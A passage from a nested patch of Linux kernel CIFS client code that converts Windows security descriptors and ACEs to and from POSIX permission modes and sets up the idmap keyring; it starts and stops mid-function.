+-				(KEY_POS_ALL & ~KEY_POS_SETATTR) |
+-				KEY_USR_VIEW | KEY_USR_READ,
+-				KEY_ALLOC_NOT_IN_QUOTA, NULL, NULL);
+-	if (IS_ERR(keyring)) {
+-		ret = PTR_ERR(keyring);
+-		goto failed_put_cred;
+-	}
+-
+-	ret = register_key_type(&cifs_idmap_key_type);
+-	if (ret < 0)
+-		goto failed_put_key;
+-
+-	/* instruct request_key() to use this special keyring as a cache for
+-	 * the results it looks up */
+-	set_bit(KEY_FLAG_ROOT_CAN_CLEAR, &keyring->flags);
+-	cred->thread_keyring = keyring;
+-	cred->jit_keyring = KEY_REQKEY_DEFL_THREAD_KEYRING;
+-	root_cred = cred;
+-
+-	cifs_dbg(FYI, "cifs idmap keyring: %d\n", key_serial(keyring));
+-	return 0;
+-
+-failed_put_key:
+-	key_put(keyring);
+-failed_put_cred:
+-	put_cred(cred);
+-	return ret;
+-}
+-
+-void
+-exit_cifs_idmap(void)
+-{
+-	key_revoke(root_cred->thread_keyring);
+-	unregister_key_type(&cifs_idmap_key_type);
+-	put_cred(root_cred);
+-	cifs_dbg(FYI, "Unregistered %s key type\n", cifs_idmap_key_type.name);
+-}
+-
+-/* copy ntsd, owner sid, and group sid from a security descriptor to another */
+-static __u32 copy_sec_desc(const struct cifs_ntsd *pntsd,
+-				struct cifs_ntsd *pnntsd,
+-				__u32 sidsoffset,
+-				struct cifs_sid *pownersid,
+-				struct cifs_sid *pgrpsid)
+-{
+-	struct cifs_sid *owner_sid_ptr, *group_sid_ptr;
+-	struct cifs_sid *nowner_sid_ptr, *ngroup_sid_ptr;
+-
+-	/* copy security descriptor control portion */
+-	pnntsd->revision = pntsd->revision;
+-	pnntsd->type = pntsd->type;
+-	pnntsd->dacloffset = cpu_to_le32(sizeof(struct cifs_ntsd));
+-	pnntsd->sacloffset = 0;
+-	pnntsd->osidoffset = cpu_to_le32(sidsoffset);
+-	pnntsd->gsidoffset = cpu_to_le32(sidsoffset + sizeof(struct cifs_sid));
+-
+-	/* copy owner sid */
+-	if (pownersid)
+-		owner_sid_ptr = pownersid;
+-	else
+-		owner_sid_ptr = (struct cifs_sid *)((char *)pntsd +
+-				le32_to_cpu(pntsd->osidoffset));
+-	nowner_sid_ptr = (struct cifs_sid *)((char *)pnntsd + sidsoffset);
+-	cifs_copy_sid(nowner_sid_ptr, owner_sid_ptr);
+-
+-	/* copy group sid */
+-	if (pgrpsid)
+-		group_sid_ptr = pgrpsid;
+-	else
+-		group_sid_ptr = (struct cifs_sid *)((char *)pntsd +
+-				le32_to_cpu(pntsd->gsidoffset));
+-	ngroup_sid_ptr = (struct cifs_sid *)((char *)pnntsd + sidsoffset +
+-					sizeof(struct cifs_sid));
+-	cifs_copy_sid(ngroup_sid_ptr, group_sid_ptr);
+-
+-	return sidsoffset + (2 * sizeof(struct cifs_sid));
+-}
+-
+-
+-/*
+-   change posix mode to reflect permissions
+-   pmode is the existing mode (we only want to overwrite part of this
+-   bits to set can be: S_IRWXU, S_IRWXG or S_IRWXO ie 00700 or 00070 or 00007
+-*/
+-static void access_flags_to_mode(__le32 ace_flags, int type, umode_t *pmode,
+-				 umode_t *pdenied, umode_t mask)
+-{
+-	__u32 flags = le32_to_cpu(ace_flags);
+-	/*
+-	 * Do not assume "preferred" or "canonical" order.
+-	 * The first DENY or ALLOW ACE which matches perfectly is
+-	 * the permission to be used. Once allowed or denied, same
+-	 * permission in later ACEs do not matter.
+-	 */
+-
+-	/* If not already allowed, deny these bits */
+-	if (type == ACCESS_DENIED) {
+-		if (flags & GENERIC_ALL &&
+-				!(*pmode & mask & 0777))
+-			*pdenied |= mask & 0777;
+-
+-		if (((flags & GENERIC_WRITE) ||
+-				((flags & FILE_WRITE_RIGHTS) == FILE_WRITE_RIGHTS)) &&
+-				!(*pmode & mask & 0222))
+-			*pdenied |= mask & 0222;
+-
+-		if (((flags & GENERIC_READ) ||
+-				((flags & FILE_READ_RIGHTS) == FILE_READ_RIGHTS)) &&
+-				!(*pmode & mask & 0444))
+-			*pdenied |= mask & 0444;
+-
+-		if (((flags & GENERIC_EXECUTE) ||
+-				((flags & FILE_EXEC_RIGHTS) == FILE_EXEC_RIGHTS)) &&
+-				!(*pmode & mask & 0111))
+-			*pdenied |= mask & 0111;
+-
+-		return;
+-	} else if (type != ACCESS_ALLOWED) {
+-		cifs_dbg(VFS, "unknown access control type %d\n", type);
+-		return;
+-	}
+-	/* else ACCESS_ALLOWED type */
+-
+-	if ((flags & GENERIC_ALL) &&
+-			!(*pdenied & mask & 0777)) {
+-		*pmode |= mask & 0777;
+-		cifs_dbg(NOISY, "all perms\n");
+-		return;
+-	}
+-
+-	if (((flags & GENERIC_WRITE) ||
+-			((flags & FILE_WRITE_RIGHTS) == FILE_WRITE_RIGHTS)) &&
+-			!(*pdenied & mask & 0222))
+-		*pmode |= mask & 0222;
+-
+-	if (((flags & GENERIC_READ) ||
+-			((flags & FILE_READ_RIGHTS) == FILE_READ_RIGHTS)) &&
+-			!(*pdenied & mask & 0444))
+-		*pmode |= mask & 0444;
+-
+-	if (((flags & GENERIC_EXECUTE) ||
+-			((flags & FILE_EXEC_RIGHTS) == FILE_EXEC_RIGHTS)) &&
+-			!(*pdenied & mask & 0111))
+-		*pmode |= mask & 0111;
+-
+-	/* If DELETE_CHILD is set only on an owner ACE, set sticky bit */
+-	if (flags & FILE_DELETE_CHILD) {
+-		if (mask == ACL_OWNER_MASK) {
+-			if (!(*pdenied & 01000))
+-				*pmode |= 01000;
+-		} else if (!(*pdenied & 01000)) {
+-			*pmode &= ~01000;
+-			*pdenied |= 01000;
+-		}
+-	}
+-
+-	cifs_dbg(NOISY, "access flags 0x%x mode now %04o\n", flags, *pmode);
+-	return;
+-}
+-
+-/*
+-   Generate access flags to reflect permissions mode is the existing mode.
+-   This function is called for every ACE in the DACL whose SID matches
+-   with either owner or group or everyone.
+-*/
+-
+-static void mode_to_access_flags(umode_t mode, umode_t bits_to_use,
+-				__u32 *pace_flags)
+-{
+-	/* reset access mask */
+-	*pace_flags = 0x0;
+-
+-	/* bits to use are either S_IRWXU or S_IRWXG or S_IRWXO */
+-	mode &= bits_to_use;
+-
+-	/* check for R/W/X UGO since we do not know whose flags
+-	   is this but we have cleared all the bits sans RWX for
+-	   either user or group or other as per bits_to_use */
+-	if (mode & S_IRUGO)
+-		*pace_flags |= SET_FILE_READ_RIGHTS;
+-	if (mode & S_IWUGO)
+-		*pace_flags |= SET_FILE_WRITE_RIGHTS;
+-	if (mode & S_IXUGO)
+-		*pace_flags |= SET_FILE_EXEC_RIGHTS;
+-
+-	cifs_dbg(NOISY, "mode: %04o, access flags now 0x%x\n",
+-		 mode, *pace_flags);
+-	return;
+-}
+-
+-static __u16 cifs_copy_ace(struct cifs_ace *dst, struct cifs_ace *src, struct cifs_sid *psid)
+-{
+-	__u16 size = 1 + 1 + 2 + 4;
+-
+-	dst->type = src->type;
+-	dst->flags = src->flags;
+-	dst->access_req = src->access_req;
+-
+-	/* Check if there's a replacement sid specified */
+-	if (psid)
+-		size += cifs_copy_sid(&dst->sid, psid);
+-	else
+-		size += cifs_copy_sid(&dst->sid, &src->sid);
+-
+-	dst->size = cpu_to_le16(size);
+-
+-	return size;
+-}
+-
+-static __u16 fill_ace_for_sid(struct cifs_ace *pntace,
+-			const struct cifs_sid *psid, __u64 nmode,
+-			umode_t bits, __u8 access_type,
+-			bool allow_delete_child)
+-{
+-	int i;
+-	__u16 size = 0;
+-	__u32 access_req = 0;
+-
+-	pntace->type = access_type;
+-	pntace->flags = 0x0;
+-	mode_to_access_flags(nmode, bits, &access_req);
+-
+-	if (access_type == ACCESS_ALLOWED && allow_delete_child)
+-		access_req |= FILE_DELETE_CHILD;
+-
+-	if (access_type == ACCESS_ALLOWED && !access_req)
+-		access_req = SET_MINIMUM_RIGHTS;
+-	else if (access_type == ACCESS_DENIED)
+-		access_req &= ~SET_MINIMUM_RIGHTS;
+-
+-	pntace->access_req = cpu_to_le32(access_req);
+-
+-	pntace->sid.revision = psid->revision;
+-	pntace->sid.num_subauth = psid->num_subauth;
+-	for (i = 0; i < NUM_AUTHS; i++)
+-		pntace->sid.authority[i] = psid->authority[i];
+-	for (i = 0; i < psid->num_subauth; i++)
+-		pntace->sid.sub_auth[i] = psid->sub_auth[i];
+-
+-	size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth * 4);
+-	pntace->size = cpu_to_le16(size);
+-
+-	return size;
+-}
+-
+-
+-#ifdef CONFIG_CIFS_DEBUG2
+-static void dump_ace(struct cifs_ace *pace, char *end_of_acl)
+-{
+-	int num_subauth;
+-
+-	/* validate that we do not go past end of acl */
+-
+-	if (le16_to_cpu(pace->size) < 16) {
+-		cifs_dbg(VFS, "ACE too small %d\n", le16_to_cpu(pace->size));
+-		return;
+-	}
+-
+-	if (end_of_acl < (char *)pace + le16_to_cpu(pace->size)) {
+-		cifs_dbg(VFS, "ACL too small to parse ACE\n");
+-		return;
+-	}
+-
+-	num_subauth = pace->sid.num_subauth;
+-	if (num_subauth) {
+-		int i;
+-		cifs_dbg(FYI, "ACE revision %d num_auth %d type %d flags %d size %d\n",
+-			 pace->sid.revision, pace->sid.num_subauth, pace->type,
+-			 pace->flags, le16_to_cpu(pace->size));
+-		for (i = 0; i < num_subauth; ++i) {
+-			cifs_dbg(FYI, "ACE sub_auth[%d]: 0x%x\n",
+-				 i, le32_to_cpu(pace->sid.sub_auth[i]));
+-		}
+-
+-		/* BB add length check to make sure that we do not have huge
+-			num auths and therefore go off the end */
+-	}
+-
+-	return;
+-}
+-#endif
+-
+-static void parse_dacl(struct cifs_acl *pdacl, char *end_of_acl,
+-		       struct cifs_sid *pownersid, struct cifs_sid *pgrpsid,
+-		       struct cifs_fattr *fattr, bool mode_from_special_sid)
+-{
+-	int i;
+-	int num_aces = 0;
+-	int acl_size;
+-	char *acl_base;
+-	struct cifs_ace **ppace;
+-
+-	/* BB need to add parm so we can store the SID BB */
+-
+-	if (!pdacl) {
+-		/* no DACL in the security descriptor, set
+-		   all the permissions for user/group/other */
+-		fattr->cf_mode |= 0777;
+-		return;
+-	}
+-
+-	/* validate that we do not go past end of acl */
+-	if (end_of_acl < (char *)pdacl + le16_to_cpu(pdacl->size)) {
+-		cifs_dbg(VFS, "ACL too small to parse DACL\n");
+-		return;
+-	}
+-
+-	cifs_dbg(NOISY, "DACL revision %d size %d num aces %d\n",
+-		 le16_to_cpu(pdacl->revision), le16_to_cpu(pdacl->size),
+-		 le32_to_cpu(pdacl->num_aces));
+-
+-	/* reset rwx permissions for user/group/other.
+-	   Also, if num_aces is 0 i.e. DACL has no ACEs,
+-	   user/group/other have no permissions */
+-	fattr->cf_mode &= ~(0777);
+-
+-	acl_base = (char *)pdacl;
+-	acl_size = sizeof(struct cifs_acl);
+-
+-	num_aces = le32_to_cpu(pdacl->num_aces);
+-	if (num_aces > 0) {
+-		umode_t denied_mode = 0;
+-
+-		if (num_aces > ULONG_MAX / sizeof(struct cifs_ace *))
+-			return;
+-		ppace = kmalloc_array(num_aces, sizeof(struct cifs_ace *),
+-				      GFP_KERNEL);
+-		if (!ppace)
+-			return;
+-
+-		for (i = 0; i < num_aces; ++i) {
+-			ppace[i] = (struct cifs_ace *) (acl_base + acl_size);
+-#ifdef CONFIG_CIFS_DEBUG2
+-			dump_ace(ppace[i], end_of_acl);
+-#endif
+-			if (mode_from_special_sid &&
+-			    (compare_sids(&(ppace[i]->sid),
+-					  &sid_unix_NFS_mode) == 0)) {
+-				/*
+-				 * Full permissions are:
+-				 * 07777 = S_ISUID | S_ISGID | S_ISVTX |
+-				 *         S_IRWXU | S_IRWXG | S_IRWXO
+-				 */
+-				fattr->cf_mode &= ~07777;
+-				fattr->cf_mode |=
+-					le32_to_cpu(ppace[i]->sid.sub_auth[2]);
+-				break;
+-			} else {
+-				if (compare_sids(&(ppace[i]->sid), pownersid) == 0) {
+-					access_flags_to_mode(ppace[i]->access_req,
+-							ppace[i]->type,
+-							&fattr->cf_mode,
+-							&denied_mode,
+-							ACL_OWNER_MASK);
+-				} else if (compare_sids(&(ppace[i]->sid), pgrpsid) == 0) {
+-					access_flags_to_mode(ppace[i]->access_req,
+-							ppace[i]->type,
+-							&fattr->cf_mode,
+-							&denied_mode,
+-							ACL_GROUP_MASK);
+-				} else if ((compare_sids(&(ppace[i]->sid), &sid_everyone) == 0) ||
+-						(compare_sids(&(ppace[i]->sid), &sid_authusers) == 0)) {
+-					access_flags_to_mode(ppace[i]->access_req,
+-							ppace[i]->type,
+-							&fattr->cf_mode,
+-							&denied_mode,
+-							ACL_EVERYONE_MASK);
+-				}
+-			}
+-
+-
+-/*			memcpy((void *)(&(cifscred->aces[i])),
+-				(void *)ppace[i],
+-				sizeof(struct cifs_ace)); */
+-
+-			acl_base = (char *)ppace[i];
+-			acl_size = le16_to_cpu(ppace[i]->size);
+-		}
+-
+-		kfree(ppace);
+-	}
+-
+-	return;
+-}
+-
+-unsigned int setup_authusers_ACE(struct cifs_ace *pntace)
+-{
+-	int i;
+-	unsigned int ace_size = 20;
+-
+-	pntace->type = ACCESS_ALLOWED_ACE_TYPE;
+-	pntace->flags = 0x0;
+-	pntace->access_req = cpu_to_le32(GENERIC_ALL);
+-	pntace->sid.num_subauth = 1;
+-	pntace->sid.revision = 1;
+-	for (i = 0; i < NUM_AUTHS; i++)
+-		pntace->sid.authority[i] =  sid_authusers.authority[i];
+-
+-	pntace->sid.sub_auth[0] =  sid_authusers.sub_auth[0];
+-
+-	/* size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth*4) */
+-	pntace->size = cpu_to_le16(ace_size);
+-	return ace_size;
+-}
+-
+-/*
+- * Fill in the special SID based on the mode. See
+- * https://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx
+- */
+-unsigned int setup_special_mode_ACE(struct cifs_ace *pntace, __u64 nmode)
+-{
+-	int i;
+-	unsigned int ace_size = 28;
+-
+-	pntace->type = ACCESS_DENIED_ACE_TYPE;
+-	pntace->flags = 0x0;
+-	pntace->access_req = 0;
+-	pntace->sid.num_subauth = 3;
+-	pntace->sid.revision = 1;
+-	for (i = 0; i < NUM_AUTHS; i++)
+-		pntace->sid.authority[i] = sid_unix_NFS_mode.authority[i];
+-
+-	pntace->sid.sub_auth[0] = sid_unix_NFS_mode.sub_auth[0];
+-	pntace->sid.sub_auth[1] = sid_unix_NFS_mode.sub_auth[1];
+-	pntace->sid.sub_auth[2] = cpu_to_le32(nmode & 07777);
+-
+-	/* size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth*4) */
+-	pntace->size = cpu_to_le16(ace_size);
+-	return ace_size;
+-}
+-
+-unsigned int setup_special_user_owner_ACE(struct cifs_ace *pntace)
+-{
+-	int i;
+-	unsigned int ace_size = 28;
+-
+-	pntace->type = ACCESS_ALLOWED_ACE_TYPE;
+-	pntace->flags = 0x0;
+-	pntace->access_req = cpu_to_le32(GENERIC_ALL);
+-	pntace->sid.num_subauth = 3;
+-	pntace->sid.revision = 1;
+-	for (i = 0; i < NUM_AUTHS; i++)
+-		pntace->sid.authority[i] = sid_unix_NFS_users.authority[i];
+-
+-	pntace->sid.sub_auth[0] = sid_unix_NFS_users.sub_auth[0];
+-	pntace->sid.sub_auth[1] = sid_unix_NFS_users.sub_auth[1];
+-	pntace->sid.sub_auth[2] = cpu_to_le32(current_fsgid().val);
+-
+-	/* size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth*4) */
+-	pntace->size = cpu_to_le16(ace_size);
+-	return ace_size;
+-}
+-
+-static void populate_new_aces(char *nacl_base,
+-		struct cifs_sid *pownersid,
+-		struct cifs_sid *pgrpsid,
+-		__u64 *pnmode, u32 *pnum_aces, u16 *pnsize,
+-		bool modefromsid)
+-{
+-	__u64 nmode;
+-	u32 num_aces = 0;
+-	u16 nsize = 0;
+-	__u64 user_mode;
+-	__u64 group_mode;
+-	__u64 other_mode;
+-	__u64 deny_user_mode = 0;
+-	__u64 deny_group_mode = 0;
+-	bool sticky_set = false;
+-	struct cifs_ace *pnntace = NULL;
+-
+-	nmode = *pnmode;
+-	num_aces = *pnum_aces;
+-	nsize = *pnsize;
+-
+-	if (modefromsid) {
+-		pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-		nsize += setup_special_mode_ACE(pnntace, nmode);
+-		num_aces++;
+-		pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-		nsize += setup_authusers_ACE(pnntace);
+-		num_aces++;
+-		goto set_size;
+-	}
+-
+-	/*
+-	 * We'll try to keep the mode as requested by the user.
+-	 * But in cases where we cannot meaningfully convert that
+-	 * into ACL, return back the updated mode, so that it is
+-	 * updated in the inode.
+-	 */
+-
+-	if (!memcmp(pownersid, pgrpsid, sizeof(struct cifs_sid))) {
+-		/*
+-		 * Case when owner and group SIDs are the same.
+-		 * Set the more restrictive of the two modes.
+-		 */
+-		user_mode = nmode & (nmode << 3) & 0700;
+-		group_mode = nmode & (nmode >> 3) & 0070;
+-	} else {
+-		user_mode = nmode & 0700;
+-		group_mode = nmode & 0070;
+-	}
+-
+-	other_mode = nmode & 0007;
+-
+-	/* We need DENY ACE when the perm is more restrictive than the next sets. */
+-	deny_user_mode = ~(user_mode) & ((group_mode << 3) | (other_mode << 6)) & 0700;
+-	deny_group_mode = ~(group_mode) & (other_mode << 3) & 0070;
+-
+-	*pnmode = user_mode | group_mode | other_mode | (nmode & ~0777);
+-
+-	/* This tells if we should allow delete child for group and everyone. */
+-	if (nmode & 01000)
+-		sticky_set = true;
+-
+-	if (deny_user_mode) {
+-		pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-		nsize += fill_ace_for_sid(pnntace, pownersid, deny_user_mode,
+-				0700, ACCESS_DENIED, false);
+-		num_aces++;
+-	}
+-
+-	/* Group DENY ACE does not conflict with owner ALLOW ACE. Keep in preferred order*/
+-	if (deny_group_mode && !(deny_group_mode & (user_mode >> 3))) {
+-		pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-		nsize += fill_ace_for_sid(pnntace, pgrpsid, deny_group_mode,
+-				0070, ACCESS_DENIED, false);
+-		num_aces++;
+-	}
+-
+-	pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-	nsize += fill_ace_for_sid(pnntace, pownersid, user_mode,
+-			0700, ACCESS_ALLOWED, true);
+-	num_aces++;
+-
+-	/* Group DENY ACE conflicts with owner ALLOW ACE. So keep it after. */
+-	if (deny_group_mode && (deny_group_mode & (user_mode >> 3))) {
+-		pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-		nsize += fill_ace_for_sid(pnntace, pgrpsid, deny_group_mode,
+-				0070, ACCESS_DENIED, false);
+-		num_aces++;
+-	}
+-
+-	pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-	nsize += fill_ace_for_sid(pnntace, pgrpsid, group_mode,
+-			0070, ACCESS_ALLOWED, !sticky_set);
+-	num_aces++;
+-
+-	pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-	nsize += fill_ace_for_sid(pnntace, &sid_everyone, other_mode,
+-			0007, ACCESS_ALLOWED, !sticky_set);
+-	num_aces++;
+-
+-set_size:
+-	*pnum_aces = num_aces;
+-	*pnsize = nsize;
+-}
+-
+-static __u16 replace_sids_and_copy_aces(struct cifs_acl *pdacl, struct cifs_acl *pndacl,
+-		struct cifs_sid *pownersid, struct cifs_sid *pgrpsid,
+-		struct cifs_sid *pnownersid, struct cifs_sid *pngrpsid)
+-{
+-	int i;
+-	u16 size = 0;
+-	struct cifs_ace *pntace = NULL;
+-	char *acl_base = NULL;
+-	u32 src_num_aces = 0;
+-	u16 nsize = 0;
+-	struct cifs_ace *pnntace = NULL;
+-	char *nacl_base = NULL;
+-	u16 ace_size = 0;
+-
+-	acl_base = (char *)pdacl;
+-	size = sizeof(struct cifs_acl);
+-	src_num_aces = le32_to_cpu(pdacl->num_aces);
+-
+-	nacl_base = (char *)pndacl;
+-	nsize = sizeof(struct cifs_acl);
+-
+-	/* Go through all the ACEs */
+-	for (i = 0; i < src_num_aces; ++i) {
+-		pntace = (struct cifs_ace *) (acl_base + size);
+-		pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-
+-		if (pnownersid && compare_sids(&pntace->sid, pownersid) == 0)
+-			ace_size = cifs_copy_ace(pnntace, pntace, pnownersid);
+-		else if (pngrpsid && compare_sids(&pntace->sid, pgrpsid) == 0)
+-			ace_size = cifs_copy_ace(pnntace, pntace, pngrpsid);
+-		else
+-			ace_size = cifs_copy_ace(pnntace, pntace, NULL);
+-
+-		size += le16_to_cpu(pntace->size);
+-		nsize += ace_size;
+-	}
+-
+-	return nsize;
+-}
+-
+-static int set_chmod_dacl(struct cifs_acl *pdacl, struct cifs_acl *pndacl,
+-		struct cifs_sid *pownersid,	struct cifs_sid *pgrpsid,
+-		__u64 *pnmode, bool mode_from_sid)
+-{
+-	int i;
+-	u16 size = 0;
+-	struct cifs_ace *pntace = NULL;
+-	char *acl_base = NULL;
+-	u32 src_num_aces = 0;
+-	u16 nsize = 0;
+-	struct cifs_ace *pnntace = NULL;
+-	char *nacl_base = NULL;
+-	u32 num_aces = 0;
+-	bool new_aces_set = false;
+-
+-	/* Assuming that pndacl and pnmode are never NULL */
+-	nacl_base = (char *)pndacl;
+-	nsize = sizeof(struct cifs_acl);
+-
+-	/* If pdacl is NULL, we don't have a src. Simply populate new ACL. */
+-	if (!pdacl) {
+-		populate_new_aces(nacl_base,
+-				pownersid, pgrpsid,
+-				pnmode, &num_aces, &nsize,
+-				mode_from_sid);
+-		goto finalize_dacl;
+-	}
+-
+-	acl_base = (char *)pdacl;
+-	size = sizeof(struct cifs_acl);
+-	src_num_aces = le32_to_cpu(pdacl->num_aces);
+-
+-	/* Retain old ACEs which we can retain */
+-	for (i = 0; i < src_num_aces; ++i) {
+-		pntace = (struct cifs_ace *) (acl_base + size);
+-
+-		if (!new_aces_set && (pntace->flags & INHERITED_ACE)) {
+-			/* Place the new ACEs in between existing explicit and inherited */
+-			populate_new_aces(nacl_base,
+-					pownersid, pgrpsid,
+-					pnmode, &num_aces, &nsize,
+-					mode_from_sid);
+-
+-			new_aces_set = true;
+-		}
+-
+-		/* If it's any one of the ACE we're replacing, skip! */
+-		if (((compare_sids(&pntace->sid, &sid_unix_NFS_mode) == 0) ||
+-				(compare_sids(&pntace->sid, pownersid) == 0) ||
+-				(compare_sids(&pntace->sid, pgrpsid) == 0) ||
+-				(compare_sids(&pntace->sid, &sid_everyone) == 0) ||
+-				(compare_sids(&pntace->sid, &sid_authusers) == 0))) {
+-			goto next_ace;
+-		}
+-
+-		/* update the pointer to the next ACE to populate*/
+-		pnntace = (struct cifs_ace *) (nacl_base + nsize);
+-
+-		nsize += cifs_copy_ace(pnntace, pntace, NULL);
+-		num_aces++;
+-
+-next_ace:
+-		size += le16_to_cpu(pntace->size);
+-	}
+-
+-	/* If inherited ACEs are not present, place the new ones at the tail */
+-	if (!new_aces_set) {
+-		populate_new_aces(nacl_base,
+-				pownersid, pgrpsid,
+-				pnmode, &num_aces, &nsize,
+-				mode_from_sid);
+-
+-		new_aces_set = true;
+-	}
+-
+-finalize_dacl:
+-	pndacl->num_aces = cpu_to_le32(num_aces);
+-	pndacl->size = cpu_to_le16(nsize);
+-
+-	return 0;
+-}
+-
+-static int parse_sid(struct cifs_sid *psid, char *end_of_acl)
+-{
+-	/* BB need to add parm so we can store the SID BB */
+-
+-	/* validate that we do not go past end of ACL - sid must be at least 8
+-	   bytes long (assuming no sub-auths - e.g. the null SID */
+-	if (end_of_acl < (char *)psid + 8) {
+-		cifs_dbg(VFS, "ACL too small to parse SID %p\n", psid);
+-		return -EINVAL;
+-	}
+-
+-#ifdef CONFIG_CIFS_DEBUG2
+-	if (psid->num_subauth) {
+-		int i;
+-		cifs_dbg(FYI, "SID revision %d num_auth %d\n",
+-			 psid->revision, psid->num_subauth);
+-
+-		for (i = 0; i < psid->num_subauth; i++) {
+-			cifs_dbg(FYI, "SID sub_auth[%d]: 0x%x\n",
+-				 i, le32_to_cpu(psid->sub_auth[i]));
+-		}
+-
+-		/* BB add length check to make sure that we do not have huge
+-			num auths and therefore go off the end */
+-		cifs_dbg(FYI, "RID 0x%x\n",
+-			 le32_to_cpu(psid->sub_auth[psid->num_subauth-1]));
+-	}
+-#endif
+-
+-	return 0;
+-}
+-
+-
+-/* Convert CIFS ACL to POSIX form */
+-static int parse_sec_desc(struct cifs_sb_info *cifs_sb,
+-		struct cifs_ntsd *pntsd, int acl_len, struct cifs_fattr *fattr,
+-		bool get_mode_from_special_sid)
+-{
+-	int rc = 0;
+-	struct cifs_sid *owner_sid_ptr, *group_sid_ptr;
+-	struct cifs_acl *dacl_ptr; /* no need for SACL ptr */
+-	char *end_of_acl = ((char *)pntsd) + acl_len;
+-	__u32 dacloffset;
+-
+-	if (pntsd == NULL)
+-		return -EIO;
+-
+-	owner_sid_ptr = (struct cifs_sid *)((char *)pntsd +
+-				le32_to_cpu(pntsd->osidoffset));
+-	group_sid_ptr = (struct cifs_sid *)((char *)pntsd +
+-				le32_to_cpu(pntsd->gsidoffset));
+-	dacloffset = le32_to_cpu(pntsd->dacloffset);
+-	dacl_ptr = (struct cifs_acl *)((char *)pntsd + dacloffset);
+-	cifs_dbg(NOISY, "revision %d type 0x%x ooffset 0x%x goffset 0x%x sacloffset 0x%x dacloffset 0x%x\n",
+-		 pntsd->revision, pntsd->type, le32_to_cpu(pntsd->osidoffset),
+-		 le32_to_cpu(pntsd->gsidoffset),
+-		 le32_to_cpu(pntsd->sacloffset), dacloffset);
+-/*	cifs_dump_mem("owner_sid: ", owner_sid_ptr, 64); */
+-	rc = parse_sid(owner_sid_ptr, end_of_acl);
+-	if (rc) {
+-		cifs_dbg(FYI, "%s: Error %d parsing Owner SID\n", __func__, rc);
+-		return rc;
+-	}
+-	rc = sid_to_id(cifs_sb, owner_sid_ptr, fattr, SIDOWNER);
+-	if (rc) {
+-		cifs_dbg(FYI, "%s: Error %d mapping Owner SID to uid\n",
+-			 __func__, rc);
+-		return rc;
+-	}
+-
+-	rc = parse_sid(group_sid_ptr, end_of_acl);
+-	if (rc) {
+-		cifs_dbg(FYI, "%s: Error %d mapping Owner SID to gid\n",
+-			 __func__, rc);
+-		return rc;
+-	}
+-	rc = sid_to_id(cifs_sb, group_sid_ptr, fattr, SIDGROUP);
+-	if (rc) {
+-		cifs_dbg(FYI, "%s: Error %d mapping Group SID to gid\n",
+-			 __func__, rc);
+-		return rc;
+-	}
+-
+-	if (dacloffset)
+-		parse_dacl(dacl_ptr, end_of_acl, owner_sid_ptr,
+-			   group_sid_ptr, fattr, get_mode_from_special_sid);
+-	else
+-		cifs_dbg(FYI, "no ACL\n"); /* BB grant all or default perms? */
+-
+-	return rc;
+-}
+-
+-/* Convert permission bits from mode to equivalent CIFS ACL */
+-static int build_sec_desc(struct cifs_ntsd *pntsd, struct cifs_ntsd *pnntsd,
+-	__u32 secdesclen, __u32 *pnsecdesclen, __u64 *pnmode, kuid_t uid, kgid_t gid,
+-	bool mode_from_sid, bool id_from_sid, int *aclflag)
+-{
+-	int rc = 0;
+-	__u32 dacloffset;
+-	__u32 ndacloffset;
+-	__u32 sidsoffset;
+-	struct cifs_sid *owner_sid_ptr, *group_sid_ptr;
+-	struct cifs_sid *nowner_sid_ptr = NULL, *ngroup_sid_ptr = NULL;
+-	struct cifs_acl *dacl_ptr = NULL;  /* no need for SACL ptr */
+-	struct cifs_acl *ndacl_ptr = NULL; /* no need for SACL ptr */
+-	char *end_of_acl = ((char *)pntsd) + secdesclen;
+-	u16 size = 0;
+-
+-	dacloffset = le32_to_cpu(pntsd->dacloffset);
+-	if (dacloffset) {
+-		dacl_ptr = (struct cifs_acl *)((char *)pntsd + dacloffset);
+-		if (end_of_acl < (char *)dacl_ptr + le16_to_cpu(dacl_ptr->size)) {
+-			cifs_dbg(VFS, "Server returned illegal ACL size\n");
+-			return -EINVAL;
+-		}
+-	}
+-
+-	owner_sid_ptr = (struct cifs_sid *)((char *)pntsd +
+-			le32_to_cpu(pntsd->osidoffset));
+-	group_sid_ptr = (struct cifs_sid *)((char *)pntsd +
+-			le32_to_cpu(pntsd->gsidoffset));
+-
+-	if (pnmode && *pnmode != NO_CHANGE_64) { /* chmod */
+-		ndacloffset = sizeof(struct cifs_ntsd);
+-		ndacl_ptr = (struct cifs_acl *)((char *)pnntsd + ndacloffset);
+-		ndacl_ptr->revision =
+-			dacloffset ? dacl_ptr->revision : cpu_to_le16(ACL_REVISION);
+-
+-		ndacl_ptr->size = cpu_to_le16(0);
+-		ndacl_ptr->num_aces = cpu_to_le32(0);
+-
+-		rc = set_chmod_dacl(dacl_ptr, ndacl_ptr, owner_sid_ptr, group_sid_ptr,
+-				    pnmode, mode_from_sid);
+-
+-		sidsoffset = ndacloffset + le16_to_cpu(ndacl_ptr->size);
+-		/* copy the non-dacl portion of secdesc */
+-		*pnsecdesclen = copy_sec_desc(pntsd, pnntsd, sidsoffset,
+-				NULL, NULL);
+-
+-		*aclflag |= CIFS_ACL_DACL;
+-	} else {
+-		ndacloffset = sizeof(struct cifs_ntsd);
+-		ndacl_ptr = (struct cifs_acl *)((char *)pnntsd + ndacloffset);
+-		ndacl_ptr->revision =
+-			dacloffset ? dacl_ptr->revision : cpu_to_le16(ACL_REVISION);
+-		ndacl_ptr->num_aces = dacl_ptr ? dacl_ptr->num_aces : 0;
+-
+-		if (uid_valid(uid)) { /* chown */
+-			uid_t id;
+-			nowner_sid_ptr = kzalloc(sizeof(struct cifs_sid),
+-								GFP_KERNEL);
+-			if (!nowner_sid_ptr) {
+-				rc = -ENOMEM;
